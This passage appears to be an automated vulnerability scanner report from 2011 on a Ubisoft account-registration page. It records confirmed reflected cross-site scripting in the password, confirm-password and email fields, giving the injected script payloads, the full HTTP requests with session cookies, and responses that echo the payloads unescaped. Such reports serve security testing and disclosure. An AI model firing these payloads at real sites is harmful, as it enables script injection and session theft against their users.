<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST '"--></style></script><script>alert(0x00054E)</script>
confirmpassword POST 3
email POST netsparker@example.com
birthdate POST ------
country POST us
_buttonClicked POST submit

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 270
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00054E)%3c%2fscript%3e&confirmpassword=3&email=netsparker%40example.com&birthdate=------&country=us&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:29:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x00054E)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST 3
confirmpassword POST '"--></style></script><script>alert(0x000559)</script>
email POST netsparker@example.com
birthdate POST ------
country POST us
_buttonClicked POST submit

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 270
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password=3&confirmpassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000559)%3c%2fscript%3e&email=netsparker%40example.com&birthdate=------&country=us&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:29:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x000559)</script>" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST 3
confirmpassword POST 3
email POST '"--></style></script><script>alert(0x00055E)</script>
birthdate POST ------
country POST us
_buttonClicked POST submit

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 247
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password=3&confirmpassword=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00055E)%3c%2fscript%3e&birthdate=------&country=us&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:29:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39960


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
